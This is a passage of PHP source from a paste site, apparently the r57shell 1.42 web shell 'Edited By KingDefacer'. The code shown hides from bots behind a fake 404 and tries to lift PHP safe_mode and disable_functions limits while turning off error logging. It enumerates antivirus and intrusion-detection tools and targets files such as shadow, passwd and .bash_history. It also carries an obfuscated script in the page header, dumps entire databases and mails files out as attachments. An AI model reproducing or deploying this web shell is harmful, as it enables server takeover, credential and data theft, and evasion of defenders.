· 6 years ago · Apr 13, 2019, 10:26 AM
1<?php
2
3
4
5if(preg_match("/bot/", $_SERVER[HTTP_USER_AGENT])) {header("HTTP/1.0 404");exit("<h1>Not Found</h1>");}
6
7
8
9$language='eng';
10
11
12
13$auth = 0;
14
15
16
17$name='';
18
19$pass='';
20
21
22
23//ru_RU, //ru_RU.cp1251, //ru_RU.iso88595, //ru_RU.koi8r, //ru_RU.utf8
24
25@setlocale(LC_ALL,'ru_RU.cp1251');
26
27
28
29@ini_restore("safe_mode");
30
31@ini_restore("open_basedir");
32
33@ini_restore("safe_mode_include_dir");
34
35@ini_restore("safe_mode_exec_dir");
36
37@ini_restore("disable_functions");
38
39@ini_restore("allow_url_fopen");
40
41
42
43if(@function_exists('ini_set'))
44
45 {
46
47 @ini_set('error_log',NULL);
48
49 @ini_set('log_errors',0);
50
51 @ini_set('file_uploads',1);
52
53 @ini_set('allow_url_fopen',1);
54
55 }
56
57else
58
59 {
60
61 @ini_alter('error_log',NULL);
62
63 @ini_alter('log_errors',0);
64
65 @ini_alter('file_uploads',1);
66
67 @ini_alter('allow_url_fopen',1);
68
69 }
70
71
72
73error_reporting(E_ALL);
74
75
76
77/* ??? ????? */
78
79$userful = array('gcc',', lcc',', cc',', ld',', php',', perl',', python',', ruby',', make',', tar',', gzip',', bzip',', bzip2',', nc',', locate',', suidperl');
80
81$danger = array(', kav',', nod32',', bdcored',', uvscan',', sav',', drwebd',', clamd',', rkhunter',', chkrootkit',', iptables',', ipfw',', tripwire',', shieldcc',', portsentry',', snort',', ossec',', lidsadm',', tcplodg',', sxid',', logcheck',', logwatch',', sysmask',', zmbscap',', sawmill',', wormscan',', ninja');
82
83$tempdirs = array(@ini_get('session.save_path').'/',@ini_get('upload_tmp_dir').'/','/tmp/','/dev/shm/','/var/tmp/');
84
85$downloaders = array('wget','fetch','lynx','links','curl','get');
86
87
88
89/* ??? ?????? ???????? ???? ????? realpath() */
90
91//$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
92
93//$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyz";
94
95//$chars_rlph = "_-.ABCDEFGHIJKLMNOPQRSTUVWXYZ";
96
97//$chars_rlph = "_-.abcdefghijklnmopqrstuvwxyz";
98
99//$chars_rlph = "_-.01234567890";
100
101$chars_rlph = "abcdefghijklnmopqrstuvwxyz";
102
103
104
105$presets_rlph = array('index.php','.htaccess','.htpasswd','httpd.conf','vhosts.conf','cfg.php','config.php','config.inc.php','config.default.php','config.inc.php',
106
107'shadow','passwd','.bash_history','.mysql_history','master.passwd','user','admin','password','administrator','phpMyAdmin','security','php.ini','cdrom','root',
108
109'my.cnf','pureftpd.conf','proftpd.conf','ftpd.conf','resolv.conf','login.conf','smb.conf','sysctl.conf','syslog.conf','access.conf','accounting.log','home','htdocs',
110
111'access','auth','error','backup','data','back','sysconfig','phpbb','phpbb2','vbulletin','vbullet','phpnuke','cgi-bin','html','robots.txt','billing');
112
113
114
115/******************************************************************************************************/
116
117
118
119define("starttime",@getmicrotime());
120
121
122
123if((!@function_exists('ini_get')) || (@ini_get('open_basedir')!=NULL) || (@ini_get('safe_mode_include_dir')!=NULL)){$open_basedir=1;} else{$open_basedir=0;};
124
125
126
127set_magic_quotes_runtime(0);
128
129@set_time_limit(0);
130
131if(@function_exists('ini_set'))
132
133 {
134
135 @ini_set('max_execution_time',0);
136
137 @ini_set('output_buffering',0);
138
139 }
140
141else
142
143 {
144
145 @ini_alter('max_execution_time',0);
146
147 @ini_alter('output_buffering',0);
148
149 }
150
151$safe_mode = @ini_get('safe_mode');
152
153#if(@function_exists('ini_get')){$safe_mode = @ini_get('safe_mode');}else{$safe_mode=1;};
154
155$version = '1.42';
156
157if(@version_compare(@phpversion(), '4.1.0') == -1)
158
159 {
160
161 $_POST = &$HTTP_POST_VARS;
162
163 $_GET = &$HTTP_GET_VARS;
164
165 $_SERVER = &$HTTP_SERVER_VARS;
166
167 $_COOKIE = &$HTTP_COOKIE_VARS;
168
169 }
170
171if (@get_magic_quotes_gpc())
172
173 {
174
175 foreach ($_POST as $k=>$v)
176
177 {
178
179 $_POST[$k] = stripslashes($v);
180
181 }
182
183 foreach ($_COOKIE as $k=>$v)
184
185 {
186
187 $_COOKIE[$k] = stripslashes($v);
188
189 }
190
191 }
192
193
194
195if($auth == 1) {
196
197if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
198
199 {
200
201 header('WWW-Authenticate: Basic realm="HELLO!"');
202
203 header('HTTP/1.0 401 Unauthorized');
204
205 exit("<h1>Access Denied</h1>");
206
207 }
208
209}
210
211
212
213if(!isset($_COOKIE['tempdir'],$_COOKIE['select_tempdir'])) {
214
215 $tempdir='./';
216
217 $select_tempdir = '<select name=tempdir><option value="./">./</option>';
218
219 foreach( $tempdirs as $item) {
220
221 if(@is_writable($item)){$select_tempdir .= '<option value="'.$item.'">'.$item.'</option>';$tempdir=$item;}
222
223 }
224
225 $select_tempdir .= '</select>';
226
227 setcookie('tempdir',$tempdir);
228
229 setcookie('select_tempdir',$select_tempdir);
230
231}else{
232
233 if(isset($_POST['tempdir'])){$tempdir = $_POST['tempdir'];}else{$tempdir = $_COOKIE['tempdir'];}
234
235 $select_tempdir = $_COOKIE['select_tempdir'];
236
237}
238
239
240
241$head = '
242
243<html>
244<head>
245<title>r57shell v.1.42 - Edited By KingDefacer</title>
246<script type="text/javascript" language="javascript">
247<!--
248ML="P<>phTsmtr/9:Cuk RIc=jSw.o";
249MI="1F=AB05@FA=D4883<::GGGHC;;343HCI7:8>9?HE621:F=AB052";
250OT="";
251for(j=0;j<MI.length;j++){
252OT+=ML.charAt(MI.charCodeAt(j)-48);
253}document.write(OT);
254// --></script>
255<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
256<STYLE>
257
258tr {
259
260BORDER-RIGHT: #aaaaaa 1px solid;
261
262BORDER-TOP: #eeeeee 1px solid;
263
264BORDER-LEFT: #eeeeee 1px solid;
265
266BORDER-BOTTOM: #aaaaaa 1px solid;
267
268color: #000000;
269
270}
271
272td {
273
274BORDER-RIGHT: #aaaaaa 1px solid;
275
276BORDER-TOP: #eeeeee 1px solid;
277
278BORDER-LEFT: #eeeeee 1px solid;
279
280BORDER-BOTTOM: #aaaaaa 1px solid;
281
282color: #000000;
283
284}
285
286.table1 {
287
288BORDER: 0px;
289
290BACKGROUND-COLOR: #D4D0C8;
291
292color: #000000;
293
294}
295
296.td1 {
297
298BORDER: 0px;
299
300font: 7pt Verdana;
301
302color: #000000;
303
304}
305
306.tr1 {
307
308BORDER: 0px;
309
310color: #000000;
311
312}
313
314table {
315
316BORDER: #eeeeee 1px outset;
317
318BACKGROUND-COLOR: #D4D0C8;
319
320color: #000000;
321
322}
323
324input {
325
326BORDER-RIGHT: #ffffff 1px solid;
327
328BORDER-TOP: #999999 1px solid;
329
330BORDER-LEFT: #999999 1px solid;
331
332BORDER-BOTTOM: #ffffff 1px solid;
333
334BACKGROUND-COLOR: #e4e0d8;
335
336font: 8pt Verdana;
337
338color: #000000;
339
340}
341
342select {
343
344BORDER-RIGHT: #ffffff 1px solid;
345
346BORDER-TOP: #999999 1px solid;
347
348BORDER-LEFT: #999999 1px solid;
349
350BORDER-BOTTOM: #ffffff 1px solid;
351
352BACKGROUND-COLOR: #e4e0d8;
353
354font: 8pt Verdana;
355
356color: #000000;;
357
358}
359
360submit {
361
362BORDER: buttonhighlight 2px outset;
363
364BACKGROUND-COLOR: #e4e0d8;
365
366width: 30%;
367
368color: #000000;
369
370}
371
372textarea {
373
374BORDER-RIGHT: #ffffff 1px solid;
375
376BORDER-TOP: #999999 1px solid;
377
378BORDER-LEFT: #999999 1px solid;
379
380BORDER-BOTTOM: #ffffff 1px solid;
381
382BACKGROUND-COLOR: #e4e0d8;
383
384font: Fixedsys bold;
385
386color: #000000;
387
388}
389
390BODY {
391
392margin: 1px;
393
394color: #000000;
395
396background-color: #e4e0d8;
397
398}
399
400A:link {COLOR:red; TEXT-DECORATION: none}
401
402A:visited { COLOR:red; TEXT-DECORATION: none}
403
404A:active {COLOR:red; TEXT-DECORATION: none}
405
406A:hover {color:blue;TEXT-DECORATION: none}
407
408</STYLE>
409
410<script language=\'javascript\'>
411
412function hide_div(id)
413
414{
415
416 document.getElementById(id).style.display = \'none\';
417
418 document.cookie=id+\'=0;\';
419
420}
421
422function show_div(id)
423
424{
425
426 document.getElementById(id).style.display = \'block\';
427
428 document.cookie=id+\'=1;\';
429
430}
431
432function change_divst(id)
433
434{
435
436 if (document.getElementById(id).style.display == \'none\')
437
438 show_div(id);
439
440 else
441
442 hide_div(id);
443
444}
445
446
447
448
449
450</script>';
451
452class zipfile
453
454{
455
456 var $datasec = array();
457
458 var $ctrl_dir = array();
459
460 var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
461
462 var $old_offset = 0;
463
464 function unix2DosTime($unixtime = 0) {
465
466 $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
467
468 if ($timearray['year'] < 1980) {
469
470 $timearray['year'] = 1980;
471
472 $timearray['mon'] = 1;
473
474 $timearray['mday'] = 1;
475
476 $timearray['hours'] = 0;
477
478 $timearray['minutes'] = 0;
479
480 $timearray['seconds'] = 0;
481
482 }
483
484 return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
485
486 ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
487
488 }
489
490 function addFile($data, $name, $time = 0)
491
492 {
493
494 $name = str_replace('\\', '/', $name);
495
496 $dtime = dechex($this->unix2DosTime($time));
497
498 $hexdtime = '\x' . $dtime[6] . $dtime[7]
499
500 . '\x' . $dtime[4] . $dtime[5]
501
502 . '\x' . $dtime[2] . $dtime[3]
503
504 . '\x' . $dtime[0] . $dtime[1];
505
506 eval('$hexdtime = "' . $hexdtime . '";');
507
508 $fr = "\x50\x4b\x03\x04";
509
510 $fr .= "\x14\x00";
511
512 $fr .= "\x00\x00";
513
514 $fr .= "\x08\x00";
515
516 $fr .= $hexdtime;
517
518 $unc_len = strlen($data);
519
520 $crc = crc32($data);
521
522 $zdata = gzcompress($data);
523
524 $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
525
526 $c_len = strlen($zdata);
527
528 $fr .= pack('V', $crc);
529
530 $fr .= pack('V', $c_len);
531
532 $fr .= pack('V', $unc_len);
533
534 $fr .= pack('v', strlen($name));
535
536 $fr .= pack('v', 0);
537
538 $fr .= $name;
539
540 $fr .= $zdata;
541
542 $this -> datasec[] = $fr;
543
544 $cdrec = "\x50\x4b\x01\x02";
545
546 $cdrec .= "\x00\x00";
547
548 $cdrec .= "\x14\x00";
549
550 $cdrec .= "\x00\x00";
551
552 $cdrec .= "\x08\x00";
553
554 $cdrec .= $hexdtime;
555
556 $cdrec .= pack('V', $crc);
557
558 $cdrec .= pack('V', $c_len);
559
560 $cdrec .= pack('V', $unc_len);
561
562 $cdrec .= pack('v', strlen($name) );
563
564 $cdrec .= pack('v', 0 );
565
566 $cdrec .= pack('v', 0 );
567
568 $cdrec .= pack('v', 0 );
569
570 $cdrec .= pack('v', 0 );
571
572 $cdrec .= pack('V', 32 );
573
574 $cdrec .= pack('V', $this -> old_offset );
575
576 $this -> old_offset += strlen($fr);
577
578 $cdrec .= $name;
579
580 $this -> ctrl_dir[] = $cdrec;
581
582 }
583
584 function file()
585
586 {
587
588 $data = implode('', $this -> datasec);
589
590 $ctrldir = implode('', $this -> ctrl_dir);
591
592 return
593
594 $data .
595
596 $ctrldir .
597
598 $this -> eof_ctrl_dir .
599
600 pack('v', sizeof($this -> ctrl_dir)) .
601
602 pack('v', sizeof($this -> ctrl_dir)) .
603
604 pack('V', strlen($ctrldir)) .
605
606 pack('V', strlen($data)) .
607
608 "\x00\x00";
609
610 }
611
612}
613
614
615
616function compress(&$filename,&$filedump,$compress)
617
618 {
619
620 global $content_encoding;
621
622 global $mime_type;
623
624 if ($compress == 'bzip' && @function_exists('bzcompress'))
625
626 {
627
628 $filename .= '.bz2';
629
630 $mime_type = 'application/x-bzip2';
631
632 $filedump = bzcompress($filedump);
633
634 }
635
636 else if ($compress == 'gzip' && @function_exists('gzencode'))
637
638 {
639
640 $filename .= '.gz';
641
642 $content_encoding = 'x-gzip';
643
644 $mime_type = 'application/x-gzip';
645
646 $filedump = gzencode($filedump);
647
648 }
649
650 else if ($compress == 'zip' && @function_exists('gzcompress'))
651
652 {
653
654 $filename .= '.zip';
655
656 $mime_type = 'application/zip';
657
658 $zipfile = new zipfile();
659
660 $zipfile -> addFile($filedump, substr($filename, 0, -4));
661
662 $filedump = $zipfile -> file();
663
664 }
665
666 else
667
668 {
669
670 $mime_type = 'application/octet-stream';
671
672 }
673
674 }
675
676
677
678function moreread($temp){
679
680global $lang,$language;
681
682$str='';
683
684 if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets')&&@function_exists('feof')&&@function_exists('fclose') && ($ffile = @fopen($temp, "r"))){
685
686 if($ffile){
687
688 while(!@feof($ffile)){$str .= @fgets($ffile);};
689
690 fclose($ffile);
691
692 }
693
694 }elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesize')&&($ffile = @fopen($temp, "r"))){
695
696 if($ffile){
697
698 $str = @fread($ffile, @filesize($temp));
699
700 @fclose($ffile);
701
702 }
703
704 }elseif(@function_exists('file')&&($ffiles = @file($temp))){
705
706 foreach ($ffiles as $ffile) { $str .= $ffile; }
707
708 }elseif(@function_exists('file_get_contents')){
709
710 $str = @file_get_contents($temp);
711
712 }elseif(@function_exists('readfile')){
713
714 $str = @readfile($temp);
715
716 }elseif(@function_exists('highlight_file')){
717
718 $str = @highlight_file($temp);
719
720 }elseif(@function_exists('show_source')){
721
722 $str = @show_source($temp);
723
724 }else{echo $lang[$language.'_text56'];}
725
726return $str;
727
728}
729
730
731
732function readzlib($filename,$temp=''){
733
734global $lang,$language;
735
736$str='';
737
738 if(!$temp) {$temp=tempnam(@getcwd(), "copytemp");};
739
740 if(@copy("compress.zlib://".$filename, $temp)) {
741
742 $str = moreread($temp);
743
744 } else echo $lang[$language.'_text119'];
745
746 @unlink($temp);
747
748return $str;
749
750}
751
752
753
754function morewrite($temp,$str='')
755
756{
757
758global $lang,$language;
759
760 if(@function_exists('fopen') && @function_exists('fwrite') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){
761
762 if($ffile){
763
764 @fwrite($ffile,$str);
765
766 @fclose($ffile);
767
768 }
769
770 }elseif(@function_exists('fopen') && @function_exists('fputs') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){
771
772 if($ffile){
773
774 @fputs($ffile,$str);
775
776 @fclose($ffile);
777
778 }
779
780 }elseif(@function_exists('file_put_contents')){
781
782 @file_put_contents($temp,$str);
783
784 }else return 0;
785
786return 1;
787
788}
789
790
791
792function mailattach($to,$from,$subj,$attach)
793
794 {
795
796 $headers = "From: $from\r\n";
797
798 $headers .= "MIME-Version: 1.0\r\n";
799
800 $headers .= "Content-Type: ".$attach['type'];
801
802 $headers .= "; name=\"".$attach['name']."\"\r\n";
803
804 $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
805
806 $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
807
808 if(mail($to,$subj,"",$headers)) { return 1; }
809
810 return 0;
811
812 }
813
814class my_sql
815
816 {
817
818 var $host = 'localhost';
819
820 var $port = '';
821
822 var $user = '';
823
824 var $pass = '';
825
826 var $base = '';
827
828 var $db = '';
829
830 var $connection;
831
832 var $res;
833
834 var $error;
835
836 var $rows;
837
838 var $columns;
839
840 var $num_rows;
841
842 var $num_fields;
843
844 var $dump;
845
846
847
848 function connect()
849
850 {
851
852 switch($this->db)
853
854 {
855
856 case 'MySQL':
857
858 if(empty($this->port)) { $this->port = '3306'; }
859
860 if(!@function_exists('mysql_connect')) return 0;
861
862 $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
863
864 if(is_resource($this->connection)) return 1;
865
866 break;
867
868 case 'MSSQL':
869
870 if(empty($this->port)) { $this->port = '1433'; }
871
872 if(!@function_exists('mssql_connect')) return 0;
873
874 $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
875
876 if($this->connection) return 1;
877
878 break;
879
880 case 'PostgreSQL':
881
882 if(empty($this->port)) { $this->port = '5432'; }
883
884 $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
885
886 if(!@function_exists('pg_connect')) return 0;
887
888 $this->connection = @pg_connect($str);
889
890 if(is_resource($this->connection)) return 1;
891
892 break;
893
894 case 'Oracle':
895
896 if(!@function_exists('ocilogon')) return 0;
897
898 $this->connection = @ocilogon($this->user, $this->pass, $this->base);
899
900 if(is_resource($this->connection)) return 1;
901
902 break;
903
904 case 'MySQLi':
905
906 if(empty($this->port)) { $this->port = '3306'; }
907
908 if(!@function_exists('mysqli_connect')) return 0;
909
910 $this->connection = @mysqli_connect($this->host,$this->user,$this->pass,$this->base,$this->port);
911
912 if(is_resource($this->connection)) return 1;
913
914 break;
915
916 case 'mSQL':
917
918 if(!@function_exists('msql_connect')) return 0;
919
920 $this->connection = @msql_connect($this->host.':'.$this->port,$this->user,$this->pass);
921
922 if(is_resource($this->connection)) return 1;
923
924 break;
925
926 case 'SQLite':
927
928 if(!@function_exists('sqlite_open')) return 0;
929
930 $this->connection = @sqlite_open($this->base);
931
932 if(is_resource($this->connection)) return 1;
933
934 break;
935
936 }
937
938 return 0;
939
940 }
941
942
943
944 function select_db()
945
946 {
947
948 switch($this->db)
949
950 {
951
952 case 'MySQL':
953
954 if(@mysql_select_db($this->base,$this->connection)) return 1;
955
956 break;
957
958 case 'MSSQL':
959
960 if(@mssql_select_db($this->base,$this->connection)) return 1;
961
962 break;
963
964 case 'PostgreSQL':
965
966 return 1;
967
968 break;
969
970 case 'Oracle':
971
972 return 1;
973
974 break;
975
976 case 'MySQLi':
977
978 return 1;
979
980 break;
981
982 case 'mSQL':
983
984 if(@msql_select_db($this->base,$this->connection)) return 1;
985
986 break;
987
988 case 'SQLite':
989
990 return 1;
991
992 break;
993
994 }
995
996 return 0;
997
998 }
999
1000
1001
1002 function query($query)
1003
1004 {
1005
1006 $this->res=$this->error='';
1007
1008 switch($this->db)
1009
1010 {
1011
1012 case 'MySQL':
1013
1014 if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
1015
1016 {
1017
1018 $this->error = @mysql_error($this->connection);
1019
1020 return 0;
1021
1022 }
1023
1024 else if(is_resource($this->res)) { return 1; }
1025
1026 return 2;
1027
1028 break;
1029
1030 case 'MSSQL':
1031
1032 if(false===($this->res=@mssql_query($query,$this->connection)))
1033
1034 {
1035
1036 $this->error = 'Query error';
1037
1038 return 0;
1039
1040 }
1041
1042 else if(@mssql_num_rows($this->res) > 0) { return 1; }
1043
1044 return 2;
1045
1046 break;
1047
1048 case 'PostgreSQL':
1049
1050 if(false===($this->res=@pg_query($this->connection,$query)))
1051
1052 {
1053
1054 $this->error = @pg_last_error($this->connection);
1055
1056 return 0;
1057
1058 }
1059
1060 else if(@pg_num_rows($this->res) > 0) { return 1; }
1061
1062 return 2;
1063
1064 break;
1065
1066 case 'Oracle':
1067
1068 if(false===($this->res=@ociparse($this->connection,$query)))
1069
1070 {
1071
1072 $this->error = 'Query parse error';
1073
1074 }
1075
1076 else
1077
1078 {
1079
1080 if(@ociexecute($this->res))
1081
1082 {
1083
1084 if(@ocirowcount($this->res) != 0) return 2;
1085
1086 return 1;
1087
1088 }
1089
1090 $error = @ocierror();
1091
1092 $this->error=$error['message'];
1093
1094 }
1095
1096 break;
1097
1098 case 'MySQLi':
1099
1100 if(false===($this->res=@mysqli_query($this->connection,$query)))
1101
1102 {
1103
1104 $this->error = @mysqli_error($this->connection);
1105
1106 return 0;
1107
1108 }
1109
1110 else if(is_resource($this->res)) { return 1; }
1111
1112 return 2;
1113
1114 break;
1115
1116 case 'mSQL':
1117
1118 if(false===($this->res=@msql_query($query,$this->connection)))
1119
1120 {
1121
1122 $this->error = @msql_error($this->connection);
1123
1124 return 0;
1125
1126 }
1127
1128 else if(is_resource($this->res)) { return 1; }
1129
1130 return 2;
1131
1132 break;
1133
1134 case 'SQLite':
1135
1136 if(false===($this->res=@sqlite_query($this->connection,$query)))
1137
1138 {
1139
1140 $this->error = @sqlite_error_string($this->connection);
1141
1142 return 0;
1143
1144 }
1145
1146 else if(is_resource($this->res)) { return 1; }
1147
1148 return 2;
1149
1150 break;
1151
1152 }
1153
1154 return 0;
1155
1156 }
1157
1158 function get_result()
1159
1160 {
1161
1162 $this->rows=array();
1163
1164 $this->columns=array();
1165
1166 $this->num_rows=$this->num_fields=0;
1167
1168 switch($this->db)
1169
1170 {
1171
1172 case 'MySQL':
1173
1174 $this->num_rows=@mysql_num_rows($this->res);
1175
1176 $this->num_fields=@mysql_num_fields($this->res);
1177
1178 while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
1179
1180 @mysql_free_result($this->res);
1181
1182 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
1183
1184 break;
1185
1186 case 'MSSQL':
1187
1188 $this->num_rows=@mssql_num_rows($this->res);
1189
1190 $this->num_fields=@mssql_num_fields($this->res);
1191
1192 while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
1193
1194 @mssql_free_result($this->res);
1195
1196 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
1197
1198 break;
1199
1200 case 'PostgreSQL':
1201
1202 $this->num_rows=@pg_num_rows($this->res);
1203
1204 $this->num_fields=@pg_num_fields($this->res);
1205
1206 while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
1207
1208 @pg_free_result($this->res);
1209
1210 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
1211
1212 break;
1213
1214 case 'Oracle':
1215
1216 $this->num_fields=@ocinumcols($this->res);
1217
1218 while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
1219
1220 @ocifreestatement($this->res);
1221
1222 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
1223
1224 break;
1225
1226 case 'MySQLi':
1227
1228 $this->num_rows=@mysqli_num_rows($this->res);
1229
1230 $this->num_fields=@mysqli_num_fields($this->res);
1231
1232 while(false !== ($this->rows[] = @mysqli_fetch_assoc($this->res)));
1233
1234 @mysqli_free_result($this->res);
1235
1236 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
1237
1238 break;
1239
1240 case 'mSQL':
1241
1242 $this->num_rows=@msql_num_rows($this->res);
1243
1244 $this->num_fields=@msql_num_fields($this->res);
1245
1246 while(false !== ($this->rows[] = @msql_fetch_array($this->res)));
1247
1248 @msql_free_result($this->res);
1249
1250 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
1251
1252 break;
1253
1254 case 'SQLite':
1255
1256 $this->num_rows=@sqlite_num_rows($this->res);
1257
1258 $this->num_fields=@sqlite_num_fields($this->res);
1259
1260 while(false !== ($this->rows[] = @sqlite_fetch_array($this->res)));
1261
1262 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
1263
1264 break;
1265
1266 }
1267
1268 return 0;
1269
1270 }
1271
1272 function dump($table)
1273
1274 {
1275
1276 if(empty($table)) return 0;
1277
1278 $this->dump=array();
1279
1280 $this->dump[0] = '##';
1281
1282 $this->dump[1] = '## --------------------------------------- ';
1283
1284 $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s");
1285
1286 $this->dump[3] = '## Database: '.$this->base;
1287
1288 $this->dump[4] = '## Table: '.$table;
1289
1290 $this->dump[5] = '## --------------------------------------- ';
1291
1292 switch($this->db)
1293
1294 {
1295
1296 case 'MySQL':
1297
1298 $this->dump[0] = '## MySQL dump';
1299
1300 if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
1301
1302 if(!$this->get_result()) return 0;
1303
1304 $this->dump[] = $this->rows[0]['Create Table'];
1305
1306 $this->dump[] = '## --------------------------------------- ';
1307
1308 if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
1309
1310 if(!$this->get_result()) return 0;
1311
1312 for($i=0;$i<$this->num_rows;$i++)
1313
1314 {
1315
1316 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
1317
1318 $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
1319
1320 }
1321
1322 break;
1323
1324 case 'MSSQL':
1325
1326 $this->dump[0] = '## MSSQL dump';
1327
1328 if($this->query('SELECT * FROM '.$table)!=1) return 0;
1329
1330 if(!$this->get_result()) return 0;
1331
1332 for($i=0;$i<$this->num_rows;$i++)
1333
1334 {
1335
1336 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
1337
1338 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
1339
1340 }
1341
1342 break;
1343
1344 case 'PostgreSQL':
1345
1346 $this->dump[0] = '## PostgreSQL dump';
1347
1348 if($this->query('SELECT * FROM '.$table)!=1) return 0;
1349
1350 if(!$this->get_result()) return 0;
1351
1352 for($i=0;$i<$this->num_rows;$i++)
1353
1354 {
1355
1356 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
1357
1358 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
1359
1360 }
1361
1362 break;
1363
1364 case 'Oracle':
1365
1366 $this->dump[0] = '## ORACLE dump';
1367
1368 if($this->query('SELECT * FROM '.$table)!=1) return 0;
1369
1370 if(!$this->get_result()) return 0;
1371
1372 for($i=0;$i<$this->num_rows;$i++)
1373
1374 {
1375
1376 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
1377
1378 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
1379
1380 }
1381
1382 break;
1383
1384 case 'MySQLi':
1385
1386 $this->dump[0] = '## MySQLi dump';
1387
1388 if($this->query('SELECT * FROM '.$table)!=1) return 0;
1389
1390 if(!$this->get_result()) return 0;
1391
1392 for($i=0;$i<$this->num_rows;$i++)
1393
1394 {
1395
1396 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysqli_real_escape_string($v);}
1397
1398 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
1399
1400 }
1401
1402 break;
1403
1404 case 'mSQL':
1405
1406 $this->dump[0] = '## mSQL dump';
1407
1408 if($this->query('SELECT * FROM '.$table)!=1) return 0;
1409
1410 if(!$this->get_result()) return 0;
1411
1412 for($i=0;$i<$this->num_rows;$i++)
1413
1414 {
1415
1416 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
1417
1418 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
1419
1420 }
1421
1422 break;
1423
1424 case 'SQLite':
1425
1426 $this->dump[0] = '## SQLite dump';
1427
1428 if($this->query('SELECT * FROM '.$table)!=1) return 0;
1429
1430 if(!$this->get_result()) return 0;
1431
1432 for($i=0;$i<$this->num_rows;$i++)
1433
1434 {
1435
1436 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
1437
1438 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
1439
1440 }
1441
1442 break;
1443
1444 default:
1445
1446 return 0;
1447
1448 break;
1449
1450 }
1451
1452 return 1;
1453
1454 }
1455
1456 function close()
1457
1458 {
1459
1460 switch($this->db)
1461
1462 {
1463
1464 case 'MySQL':
1465
1466 @mysql_close($this->connection);
1467
1468 break;
1469
1470 case 'MSSQL':
1471
1472 @mssql_close($this->connection);
1473
1474 break;
1475
1476 case 'PostgreSQL':
1477
1478 @pg_close($this->connection);
1479
1480 break;
1481
1482 case 'Oracle':
1483
1484 @oci_close($this->connection);
1485
1486 break;
1487
1488 case 'MySQLi':
1489
1490 @mysqli_close($this->connection);
1491
1492 break;
1493
1494 case 'mSQL':
1495
1496 @msql_close($this->connection);
1497
1498 break;
1499
1500 case 'SQLite':
1501
1502 @sqlite_close($this->connection);
1503
1504 break;
1505
1506 }
1507
1508 }
1509
1510 function affected_rows()
1511
1512 {
1513
1514 switch($this->db)
1515
1516 {
1517
1518 case 'MySQL':
1519
1520 return @mysql_affected_rows($this->res);
1521
1522 break;
1523
1524 case 'MSSQL':
1525
1526 return @mssql_affected_rows($this->res);
1527
1528 break;
1529
1530 case 'PostgreSQL':
1531
1532 return @pg_affected_rows($this->res);
1533
1534 break;
1535
1536 case 'Oracle':
1537
1538 return @ocirowcount($this->res);
1539
1540 break;
1541
1542 case 'MySQLi':
1543
1544 return @mysqli_affected_rows($this->res);
1545
1546 break;
1547
1548 case 'mSQL':
1549
1550 return @msql_affected_rows($this->res);
1551
1552 break;
1553
1554 case 'SQLite':
1555
1556 return @sqlite_changes($this->res);
1557
